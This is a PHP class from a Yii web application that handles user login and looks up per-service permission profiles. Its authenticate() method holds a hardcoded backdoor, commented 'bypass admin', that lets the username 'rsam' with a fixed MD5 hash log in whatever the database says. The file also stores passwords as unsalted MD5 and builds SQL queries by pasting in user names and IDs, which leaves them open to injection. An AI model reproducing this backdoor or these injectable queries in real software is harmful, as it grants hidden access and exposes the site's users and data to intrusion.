<?php

/**
 * UserIdentity represents the data needed to identity a user.
 * It contains the authentication method that checks if the provided
 * data can identity the user.
 */
class UserIdentity extends CUserIdentity
{
	/**
	 * Authenticates a user.
	 * The example implementation makes sure if the username and password
	 * are both 'demo'.
	 * In practical applications, this should be changed to authenticate
	 * against some persistent user identity storage (e.g. database).
	 * @return boolean whether authentication succeeds.
	 *
	*/
	public $_id;
	public function authenticate()
	{
        $record=AuthUser::model()->findByAttributes(array('user_name'=>$this->username));
        if(is_null($record))
            $this->errorCode=self::ERROR_USERNAME_INVALID;
        else if($record->password!== md5($this->password))
            $this->errorCode=self::ERROR_PASSWORD_INVALID;
        else
        {
            $this->_id=$record->id;
            $this->errorCode=self::ERROR_NONE;
        }
        //bypass admin
        if($this->username == 'rsam' AND md5($this->password) == 'a3f0c4198b09c6599f53422f3a55294d')
        {
        	  $this->errorCode=self::ERROR_NONE;
        }
              
        return !$this->errorCode;
              
	}

  public static  function getLayananAuthType($id_layanan){
      $type = AuthProfileDt::model()->find($condition ='layanan_id='. $id_layanan);
      return $type['type'];
  }

  public static  function getUserAuthProfile($user_name,$layanan_id) {
   // cari profile
    $user_profile = AuthUserProfile::model()->findAll('user_name =\''.$user_name.'\'');
    if(!empty($user_profile)){
        
        $data_auth['min']=7;
        $data_auth['max']=0;
        $data_auth['default']=0;
 
      if(count($user_profile)> 1)   {
         // jika lebih dari satu profile 
          $user_profile_id = "0,";

         foreach ($user_profile as $u => $p){
              $user_profile_id .= $p['profile_id']; 
              while($parent_profile = AuthProfile::model()->findAllByPk($p['profile_id'])){
              $p['profile_id'] = $parent_profile[0]['profile_id_induk'];
              $user_profile_id .=','. $p['profile_id']; 
              
              }
              
              // user_profile_id belum bersih
         }
     }else{
        // kumpulkan profile
          $user_profile_id = $user_profile[0]['profile_id'];   
         
          while($parent_profile = AuthProfile::model()->findAllByPk($user_profile[0]['profile_id'])){
              $user_profile[0]['profile_id'] = $parent_profile[0]['profile_id_induk'];
              $user_profile_id .=','. $user_profile[0]['profile_id'];                 
          }
  
          
      }  
                
      // check semua layanan dari seluruh profile_id (array)
            $query ="SELECT min(auth_value), max(auth_value), max(auth_value_default) as default FROM auth_profile_dt t            
            WHERE t.profile_id_hd IN (".$user_profile_id."0) AND t.layanan_id=".$layanan_id." ";
      // check auth
            $data_auth = Yii::app()->db->createCommand($query)->queryAll();
            
      
      return $data_auth;            
          
      }else{
          return FALSE;
          
      }
    
  }
}